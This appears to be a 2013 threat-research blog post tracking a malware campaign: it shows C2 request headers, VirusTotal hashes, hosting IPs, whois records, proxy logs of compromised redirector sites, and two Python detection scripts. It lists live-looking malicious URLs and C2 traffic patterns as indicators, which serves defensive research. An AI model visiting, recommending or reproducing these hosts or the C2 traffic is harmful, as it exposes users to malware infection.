Connection: keep-alive<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUFvJpVb_ptcmZphfY19QKVjWkxDYw0RvcqieKPNFuSkgWDfpmy8G03MqNLedhhJhDiffhQiC3SIXonCuUemWJBq6u8k6ki5TmHM_wJcUJ7K3hE03QBgeMhW-yAmzOZRo0o1DV3rmXpeg/s1600/get.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUFvJpVb_ptcmZphfY19QKVjWkxDYw0RvcqieKPNFuSkgWDfpmy8G03MqNLedhhJhDiffhQiC3SIXonCuUemWJBq6u8k6ki5TmHM_wJcUJ7K3hE03QBgeMhW-yAmzOZRo0o1DV3rmXpeg/s1600/get.png" /></a></div>
<br />
<br />
<br />
POST /pmserver/get.php HTTP/1.1<br />
Accept: */*<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Host: adverts2013.com<br />
Content-Length: 253<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/1.2.7<br />
Date: Tue, 26 Mar 2013 13:30:29 GMT<br />
Content-Type: text/html<br />
Transfer-Encoding: chunked<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.23-1~dotdeb.0<br />
<br />
<br />
<br />
<br />
<br />
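The header dumps above share a few checkable traits: POSTs to /pmserver/*.php, an MSIE 8 User-Agent sent without the headers a browser normally includes, and an octet-stream download whose filename claims .jpg and carries a percent-encoded path. The following Python is an added example, not part of the original post; the finding names and the benign sample are constructed for illustration.<br />

```python
import re
from urllib.parse import unquote

# Paths seen in this post: browse.php, get.php, backget.php, file.php
PM_PATH = re.compile(r"^/pmserver/[A-Za-z0-9_]+\.php$")
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")
# Headers Internet Explorer normally sends; all are absent in the captures.
BROWSER_HEADERS = ("accept-language", "accept-encoding", "referer")

# Header blocks copied from the captures in this post (bodies were not shown).
CAPTURED_BROWSE_REQ = """POST /pmserver/browse.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: hotels2013.org
Content-Length: 119
Connection: Keep-Alive
Cache-Control: no-cache
"""
CAPTURED_BROWSE_RESP = """HTTP/1.1 200 OK
Server: nginx/1.2.7
Content-Type: application/octet-stream
Content-Length: 26704
Content-Disposition: attachment; filename="%2e/files/ftc.jpg"
Content-Transfer-Encoding: binary
"""
CAPTURED_GET_REQ = """POST /pmserver/get.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: adverts2013.com
Content-Length: 380
Connection: Keep-Alive
Cache-Control: no-cache
"""
CAPTURED_GET_RESP = """HTTP/1.1 200 OK
Server: nginx/1.2.7
Content-Type: text/html
Transfer-Encoding: chunked
"""
# Constructed benign transaction for contrast (not from the post).
BENIGN_REQ = """GET /images/logo.jpg HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: intranet.example
"""
BENIGN_RESP = """HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 5120
"""


def parse_head(raw):
    """Return (start_line, {lowercased header name: value})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers


def request_findings(raw):
    start, h = parse_head(raw)
    method, target, _ = start.split(" ", 2)
    path = target.split("?", 1)[0]
    out = set()
    if method == "POST" and PM_PATH.match(path):
        out.add("pmserver-post")
    # Heuristic: claims to be IE but sends none of the usual browser headers.
    if "MSIE" in h.get("user-agent", "") and not any(n in h for n in BROWSER_HEADERS):
        out.add("sparse-browser-headers")
    return out


def response_findings(raw):
    _, h = parse_head(raw)
    out = set()
    m = re.search(r'filename="?([^";]+)', h.get("content-disposition", ""))
    if m:
        name = unquote(m.group(1))  # "%2e/files/ftc.jpg" -> "./files/ftc.jpg"
        ctype = h.get("content-type", "").split(";")[0].strip().lower()
        if ctype == "application/octet-stream" and name.lower().endswith(IMAGE_EXT):
            out.add("type-extension-mismatch")
        if "/" in name or "\\" in name or name.startswith("."):
            out.add("path-in-filename")
    return out


def triage(request, response):
    """Sorted list of findings for one request/response pair."""
    return sorted(request_findings(request) | response_findings(response))


if __name__ == "__main__":
    print("browse.php:", triage(CAPTURED_BROWSE_REQ, CAPTURED_BROWSE_RESP))
    print("get.php:   ", triage(CAPTURED_GET_REQ, CAPTURED_GET_RESP))
    print("benign:    ", triage(BENIGN_REQ, BENIGN_RESP))
```
<br />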
<br />
<b><span style="font-size: large;">VT</span></b><br />
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 8px; margin-left: 8px; max-width: 100%;"><tbody>
<tr><td style="padding: 8px 10px 9px;">SHA256:</td><td style="padding: 8px 10px 9px;">98a822051873c177dd4af1c387754abba8ad510ec38edb807fc0a42e2cacb1c8</td></tr>
<tr><td style="padding: 8px 10px 9px;">File name:</td><td style="padding: 8px 10px 9px;">pon.exe</td></tr>
<tr><td style="padding: 8px 10px 9px;">Detection ratio:</td><td class="
text-red " style="color: #b40c1a; padding: 8px 10px 9px;">4 / 45</td></tr>
<tr><td style="padding: 8px 10px 9px;">Analysis date:</td><td style="padding: 8px 10px 9px;">2013-03-26 16:12:47 UTC ( 1 minute ago )</td></tr>
</tbody></table>
<br />
<br />
<a href="https://www.virustotal.com/en/file/98a822051873c177dd4af1c387754abba8ad510ec38edb807fc0a42e2cacb1c8/analysis/1364314367/">https://www.virustotal.com/en/file/98a822051873c177dd4af1c387754abba8ad510ec38edb807fc0a42e2cacb1c8/analysis/1364314367/</a><br />
<br />
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 8px; margin-left: 8px; max-width: 100%;"><tbody>
<tr><td style="padding: 8px 10px 9px;">SHA256:</td><td style="padding: 8px 10px 9px;">fd7868f90757f63a092220a06f28ec2e500358d23c0ba6aae13bc61ff3b14ecc</td></tr>
<tr><td style="padding: 8px 10px 9px;">File name:</td><td style="padding: 8px 10px 9px;">fedex_trk_61293150511865307217.scr</td></tr>
<tr><td style="padding: 8px 10px 9px;">Detection ratio:</td><td class="
text-red " style="color: #b40c1a; padding: 8px 10px 9px;">8 / 46</td></tr>
<tr><td style="padding: 8px 10px 9px;">Analysis date:</td><td style="padding: 8px 10px 9px;">2013-03-26 01:49:15 UTC ( 14 hours, 3 minutes ago )</td></tr>
</tbody></table>
<br />
<a href="https://www.virustotal.com/en/file/fd7868f90757f63a092220a06f28ec2e500358d23c0ba6aae13bc61ff3b14ecc/analysis/">https://www.virustotal.com/en/file/fd7868f90757f63a092220a06f28ec2e500358d23c0ba6aae13bc61ff3b14ecc/analysis/</a><br />
<br />
<br />
<br />
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 8px; margin-left: 8px; max-width: 100%;"><tbody>
<tr><td style="padding: 8px 10px 9px;">SHA256:</td><td style="padding: 8px 10px 9px;">f10596fca058a7303c9d1c38ba54b84b8d535e680a26c17de6703888f23e7154</td></tr>
<tr><td style="padding: 8px 10px 9px;">File name:</td><td style="padding: 8px 10px 9px;">alfasp1alfa3.exe</td></tr>
<tr><td style="padding: 8px 10px 9px;">Detection ratio:</td><td class="
text-red " style="color: #b40c1a; padding: 8px 10px 9px;">6 / 44</td></tr>
<tr><td style="padding: 8px 10px 9px;">Analysis date:</td><td style="padding: 8px 10px 9px;">2013-03-26 16:08:45 UTC ( 1 minute ago )</td></tr>
</tbody></table>
<br />
<a href="https://www.virustotal.com/en/file/f10596fca058a7303c9d1c38ba54b84b8d535e680a26c17de6703888f23e7154/analysis/1364314125/">https://www.virustotal.com/en/file/f10596fca058a7303c9d1c38ba54b84b8d535e680a26c17de6703888f23e7154/analysis/1364314125/</a><br />
<br />
<br />
<b><span style="font-size: large;">Research on /forum/links/columns.php</span></b><br />
Posted by Fort Knox Networks, 2013-01-21<br />
<br />
<b>The current IP of choice is 91.224.135.20</b><br />
<br />
<br />
<br />
<br />
<b>Similar Types hosted at:</b><br />
<br />
<br />
<br />
<b>Recent IP Addresses Hosting This Garbage:</b><br />
<b><br /></b>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 626px;">
<colgroup><col style="mso-width-alt: 9216; mso-width-source: userset; width: 189pt;" width="252"></col>
<col style="mso-width-alt: 13677; mso-width-source: userset; width: 281pt;" width="374"></col>
</colgroup><tbody>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt; width: 189pt;" width="252"><b><u>IP</u></b></td>
<td style="width: 281pt;" width="374"><b><u>Hoster</u></b></td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td class="xl65" height="20" style="height: 15.0pt; width: 189pt;" width="252">187.85.160.106</td>
<td class="xl66" style="border-left: none;">AS28343</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td class="xl65" height="20" style="border-top: none; height: 15.0pt; width: 189pt;" width="252">212.112.207.15</td>
<td class="xl66" style="border-left: none; border-top: none;">AS702</td>
</tr>
<tr height="21" style="height: 15.75pt;">
<td class="xl67" height="21" style="border-top: none; height: 15.75pt; width: 189pt;" width="252">82.165.193.26</td>
<td class="xl68" style="border-left: none; border-top: none;">AS8560-MNT</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td class="xl71" height="20" style="height: 15.0pt; width: 189pt;" width="252">89.111.176.125</td>
<td class="xl72">address: Garant-Park-Telecom, Ltd</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td class="xl73" height="20" style="height: 15.0pt;"> </td>
<td class="xl74">address: Alexander Panov</td>
</tr>
<tr height="21" style="height: 15.75pt;">
<td class="xl75" height="21" style="height: 15.75pt;"> </td>
<td class="xl76">address: Moscow State University</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td class="xl69" height="20" style="height: 15.0pt; width: 189pt;" width="252">91.224.135.20</td>
<td class="xl70" style="border-left: none;">AS56413</td>
</tr>
</tbody></table>
<br />
<b><br /></b>
<b>Historical IPs Hosting "/forum/links/column.php"</b><br />
<br />
<b><br /></b>
<br />
<b>Alphabetical list of reported/known domains hosting this pattern:</b><br />
<br />
<b><br /></b>
<b>Recently Checked Known Redirectors - checked to see whether they are live (a redirector whose row is immediately followed by a red row is live)</b><br />
<br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 693px;">
<colgroup><col style="mso-width-alt: 5705; mso-width-source: userset; width: 117pt;" width="156"></col>
<col style="mso-width-alt: 1280; mso-width-source: userset; width: 26pt;" width="35"></col>
<col style="mso-width-alt: 2450; mso-width-source: userset; width: 50pt;" width="67"></col>
<col style="mso-width-alt: 15908; mso-width-source: userset; width: 326pt;" width="435"></col>
</colgroup><tbody>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt; width: 117pt;" width="156">TCP_IMS_HIT/304</td>
<td align="right" style="width: 26pt;" width="35">320</td>
<td style="width: 50pt;" width="67">GET</td>
<td style="width: 326pt;" width="435">http://bartinemusicstudio.com/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">341</td>
<td>GET</td>
<td>http://galantvisa.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/403</td>
<td align="right">561</td>
<td>GET</td>
<td>http://ceratofortekoup.sg/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">569</td>
<td>GET</td>
<td>http://limavirtual.unicordoba.edu.co/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">325</td>
<td>GET</td>
<td>http://www.shadownessence.net/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">462</td>
<td>GET</td>
<td>http://www.rovere.lu/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">328</td>
<td>GET</td>
<td>http://taleemindia.org/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">467</td>
<td>GET</td>
<td>http://schetchik-grand.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">3952</td>
<td>GET</td>
<td>http://aanchalfoundation.org/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">468</td>
<td>GET</td>
<td>http://www.telemirspb.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/301</td>
<td align="right">570</td>
<td>GET</td>
<td>http://ktakademija.lt/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">293</td>
<td>GET</td>
<td>http://thekla-kampelmann.com/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_NEGATIVE_HIT/404</td>
<td align="right">476</td>
<td>GET</td>
<td>http://schetchik-grand.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/500</td>
<td align="right">798</td>
<td>GET</td>
<td>http://banner.terrarium.pl/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">327</td>
<td>GET</td>
<td>http://eens.econz.net/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">320</td>
<td>GET</td>
<td>http://e-hydromax.pl/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">343</td>
<td>GET</td>
<td>http://test-dm.designcon.tmweb.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_NEGATIVE_HIT/404</td>
<td align="right">471</td>
<td>GET</td>
<td>http://www.rovere.lu/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">328</td>
<td>GET</td>
<td>http://taleemindia.org/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/200</td>
<td align="right">661</td>
<td>GET</td>
<td>http://www.fonlider.rs/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">328</td>
<td>GET</td>
<td>http://gurupra.com/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">320</td>
<td>GET</td>
<td>http://algamish.com/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">320</td>
<td>GET</td>
<td>http://ismmania.com/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">328</td>
<td>GET</td>
<td>http://jayhawksbasketball.ca/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_MISS/404</td>
<td align="right">468</td>
<td>GET</td>
<td>http://www.miel-baumanskaya.ru/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_IMS_HIT/304</td>
<td align="right">327</td>
<td>GET</td>
<td>http://avatar-italia.it/wlc.htm</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">TCP_DENIED/403</td>
<td align="right">1425</td>
<td>GET</td>
<td style="background-color: #ffc7ce; background-position: initial initial; background-repeat: initial initial; color: #9c0006; font-family: Calibri; font-size: 11pt; text-underline-style: none;">http://dfudont.ru:8080/forum/links/column.php</td>
</tr>
</tbody></table>
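<br />
The liveness check used in the table above (a <code>/wlc.htm</code> request followed immediately by a request for <code>:8080/forum/links/column.php</code>), as an added Python example that is not part of the original post. The log lines are constructed, use reserved <code>.example</code> hosts, and assume only the four columns shown in the table (result/status, bytes, method, URL); the function names are hypothetical.<br />

```python
"""Pair each redirector request with the landing-page request that follows it."""
import re
from urllib.parse import urlsplit

# Constructed sample in the table's column order: result/status, bytes, method, URL.
# Hosts use the reserved .example TLD; they are not indicators from the post.
SAMPLE_LOG = """\
TCP_IMS_HIT/304 320 GET http://redirector-a.example/wlc.htm
TCP_DENIED/403 1425 GET http://landing.example:8080/forum/links/column.php
TCP_MISS/404 569 GET http://redirector-b.example/wlc.htm
TCP_MISS/200 661 GET http://redirector-c.example/wlc.htm
TCP_DENIED/403 1425 GET http://landing.example:8080/forum/links/column.php
TCP_MISS/500 798 GET http://redirector-d.example/wlc.htm
TCP_IMS_HIT/304 328 GET http://redirector-a.example/wlc.htm
TCP_DENIED/403 1425 GET http://landing.example:8080/forum/links/column.php
TCP_DENIED/403 1425 GET http://landing.example:8080/forum/links/column.php
"""

LINE_RE = re.compile(
    r"^(?P<result>[A-Z_]+)/(?P<status>\d{3})\s+(?P<size>\d+)\s+"
    r"(?P<method>[A-Z]+)\s+(?P<url>\S+)$"
)

# URL patterns taken from the post.
REDIRECTOR_PATH = "/wlc.htm"
LANDING_PATH = "/forum/links/column.php"
LANDING_PORT = 8080


def parse_line(line):
    """Return a dict for one log line, or None if the line is malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    url = m.group("url")
    if url.lower().startswith("hxxp"):  # accept defanged URLs as written in reports
        url = "http" + url[4:]
    parts = urlsplit(url)
    try:
        port = parts.port
    except ValueError:  # non-numeric or out-of-range port
        return None
    if not parts.hostname:
        return None
    return {
        "result": m.group("result"),
        "status": int(m.group("status")),
        "host": parts.hostname,
        "port": port,
        "path": parts.path,
    }


def classify(entry):
    """Label a parsed entry as 'landing', 'redirector' or 'other'."""
    if entry["path"] == LANDING_PATH and entry["port"] == LANDING_PORT:
        return "landing"
    if entry["path"] == REDIRECTOR_PATH:
        return "redirector"
    return "other"


def find_live_redirectors(log_text):
    """Mark a redirector live when the very next request is a landing-page hit.

    Liveness comes from the follow-on request, not the redirector's own status:
    a 304 served from cache still sends the browser on to the landing page.
    """
    report = {}      # redirector host -> {"live", "statuses", "landing"}
    orphans = []     # landing requests with no redirector directly before them
    previous = None  # last successfully parsed entry
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        kind = classify(entry)
        if kind == "redirector":
            rec = report.setdefault(
                entry["host"], {"live": False, "statuses": set(), "landing": set()}
            )
            rec["statuses"].add(entry["status"])
        elif kind == "landing":
            if previous is not None and classify(previous) == "redirector":
                rec = report[previous["host"]]
                rec["live"] = True
                rec["landing"].add(entry["host"])
            else:
                orphans.append(entry["host"])
        previous = entry
    return report, orphans


def live_hosts(report):
    """Sorted list of redirector hosts that were seen handing off to a landing page."""
    return sorted(host for host, rec in report.items() if rec["live"])


if __name__ == "__main__":
    report, orphans = find_live_redirectors(SAMPLE_LOG)
    for host in sorted(report):
        rec = report[host]
        state = "LIVE" if rec["live"] else "dead"
        print(f"{host:28} {state:5} statuses={sorted(rec['statuses'])}")
    print("unattributed landing requests:", orphans)
```

Landing-page requests that are not directly preceded by a redirector are reported separately, because they point at a redirector that is not yet in the watch list.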
<br />
<br />
<br />
<b>Whois - I'm loving the gmail address</b><br />
<br />
<h3 style="color: #002b82; font-family: Arial, Helvetica, Verdana, sans-serif; font-size: 18px; line-height: 0; margin-top: 40px;">
Network Whois record</h3>
<div style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px;">
Queried <span class="ipaddr" style="color: #002b82; font-weight: bold;">whois.ripe.net</span> with "<span class="ipaddr" style="color: #002b82; font-weight: bold;">-B 91.224.135.20</span>"...</div>
<pre style="font-family: 'Courier New', monospace; font-size: 13px;">% Information related to '91.224.134.0 - 91.224.135.255'
inetnum: 91.224.134.0 - 91.224.135.255
netname: PROSERVIS-NET
descr: Proservis UAB
country: LT
org: ORG-UP13-RIPE
admin-c: PJ2859-RIPE
tech-c: MD138-RIPE
status: ASSIGNED PI
notify: ipas.master@gmail.com
mnt-by: RIPE-NCC-END-MNT
mnt-by: MNT-ALFATELECOM
mnt-by: MNT-PROSERVIS-LT
mnt-lower: RIPE-NCC-END-MNT
mnt-routes: MNT-PROSERVIS-LT
mnt-domains: MNT-PROSERVIS-LT
changed: ipas.master@gmail.com 20110302
source: RIPE
</pre>
<div>
<br /></div>
<div>
<br /></div>
<br />
<br />
<pre style="font-family: 'Courier New', monospace; font-size: 13px;">route: 91.224.134.0/23
descr: PROSERVIS
origin: AS56413
mnt-by: MNT-PROSERVIS-LT
changed: marius@proservis.lt 20110405
source: RIPE</pre>
<br />
<b><br /></b>
<b>Reported Recent Redirectors</b><br />
<b><i><span style="font-size: xx-small;">Note, other redirectors are possible. </span></i></b><br />
<br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 383px;">
<colgroup><col style="mso-width-alt: 11666; mso-width-source: userset; width: 239pt;" width="319"></col>
<col style="width: 48pt;" width="64"></col>
</colgroup><tbody>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://rovere.lu/wlc.htm</td>
<td>80.92.67.155</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://sagafurs.mexaimoda.ru/wlc.htm</td>
<td>188.120.39.56</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://san-tyr.ru/wlc.htm</td>
<td>83.172.33.19</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://schetchik-grand.ru/wlc.htm</td>
<td>92.53.123.113</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://secure.publiquest.net/wlc.htm</td>
<td>23.23.211.79</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://shadownessence.net/wlc.htm</td>
<td>195.74.38.18</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://silkway.webmanager.kz/wlc.htm</td>
<td>212.154.250.254</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://sv-company.ae/wlc.htm</td>
<td>176.57.216.3</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://taleemindia.org/wlc.htm</td>
<td>173.0.137.215</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://test-dm.designcon.tmweb.ru/wlc.htm</td>
<td>176.57.216.3</td>
</tr>
